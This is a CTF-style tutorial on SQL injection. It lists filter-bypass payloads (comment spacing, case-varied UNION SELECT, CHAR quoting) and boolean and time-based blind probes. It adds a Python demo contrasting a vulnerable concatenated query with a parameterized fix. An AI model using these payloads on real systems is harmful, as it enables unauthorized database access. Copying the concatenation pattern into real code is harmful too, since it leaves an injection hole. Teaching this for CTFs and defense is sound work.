SQL Injection in CTFs

Intermediate, 35 min, Writeup

SQL injection techniques specific to CTF challenges

Learning Objectives

  • Identify SQL injection points
  • Bypass CTF-specific filters
  • Extract flags from databases
  • Handle unusual database schemas

SQL Injection in CTFs goes beyond the basics. You will face WAF bypasses, filter evasion, and creative exploitation.

CTF SQLi challenges often have filters. Know multiple ways to achieve the same result!

Filter Bypasses

sql
-- Space filter bypasses
/**/ -- Comment as space
+ -- Plus sign
%09 -- Tab

-- Keyword filter bypasses
1' UnIoN SeLeCt 1,2,3-- -- Case variation

-- Quote bypass:
CHAR(39) -- Single quote in MySQL
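
Why filters of this kind do not hold, seen from the code being defended: the following is an added example, not part of the original writeup. It assumes Python's sqlite3 module, a constructed `items` table, and a hypothetical `naive_filter` blocklist; the input is the case-variation payload above with `/**/` in place of spaces. The concatenated query returns the injected row, while the parameterized query treats the same input as plain data.

```python
import sqlite3

def make_db():
    """Constructed sample database: one table, one row."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (id TEXT, name TEXT, price INTEGER)")
    db.execute("INSERT INTO items VALUES ('1', 'widget', 10)")
    return db

def naive_filter(value):
    """Hypothetical blocklist: rejects spaces and lowercase keywords only."""
    banned = (" ", "union", "select")
    return not any(token in value for token in banned)

def lookup_concat(db, item_id):
    """Vulnerable: blocklist plus string concatenation."""
    if not naive_filter(item_id):
        return None  # request rejected by the filter
    query = "SELECT id, name, price FROM items WHERE id = '" + item_id + "'"
    return db.execute(query).fetchall()

def lookup_param(db, item_id):
    """Hardened: the value is bound to a placeholder and never parsed as SQL."""
    query = "SELECT id, name, price FROM items WHERE id = ?"
    return db.execute(query, (item_id,)).fetchall()

# Constructed input: the page's case-variation payload, spaces replaced by /**/
PAYLOAD = "1'/**/UnIoN/**/SeLeCt/**/1,2,3--"

if __name__ == "__main__":
    db = make_db()
    print("filter accepts payload:", naive_filter(PAYLOAD))
    print("concatenated query:    ", lookup_concat(db, PAYLOAD))
    print("parameterized query:   ", lookup_param(db, PAYLOAD))
    print("parameterized, id '1': ", lookup_param(db, "1"))
```

The fix is the placeholder, not a longer blocklist: with bound parameters the filter can be dropped entirely.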

Blind SQLi

sql
-- Boolean-based blind
1' AND 1=1-- (normal response)
1' AND 1=2-- (different response)

-- Time-based blind
1' AND SLEEP(5)-- -- MySQL
1' AND pg_sleep(5)-- -- PostgreSQL

Knowledge Check

How do you bypass a space filter in SQL injection?

Key Takeaways

  • /**/ comments replace spaces in most SQL dialects
  • Case variation (SeLeCt) bypasses simple filters
  • CHAR() function avoids quote filters